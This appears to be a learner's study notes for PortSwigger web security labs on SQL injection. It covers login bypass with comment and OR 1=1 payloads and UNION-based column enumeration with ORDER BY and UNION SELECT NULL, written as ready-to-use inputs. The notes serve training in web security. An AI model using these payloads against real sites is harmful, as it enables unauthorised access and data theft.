PSG SQL

Basic SQL Login Auth bypass

Note : If inside burp repeater , remember to CTRL + U to format the payload

' order by 1 --

will become

'+order+by+1+--

Vuln code

`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`

Crafting

SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'

Exploit Delivery

administrator' --
' OR 1=1 --

Type of SQL injections

  • inband SQLi : you get response aka normal sqli

  • inferential SQLi : you don't get response aka blind sqli

  • Out-of-band-SQLi : your use a Server as man in middle send back the response to u

UNION attack to retreive data from other table

Vuln code

select * from categoryTable where category='Coporate Gifts'
select * from categoryTable where category='Coporate Gifts'

Determine number of columns

' order by 1 -- 
' order by 2 --

Combine order by with select query

select * from categoryTable where category='' order by 1 --anything here gets ignored 

UNION SELECT can be used to double check the number of columns

' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL--

Ensure same Data type

'a' , 'a'
123 , 'a123'
  • characters?

  • alphanumeric?

  • numbers?

Last updated

Was this helpful?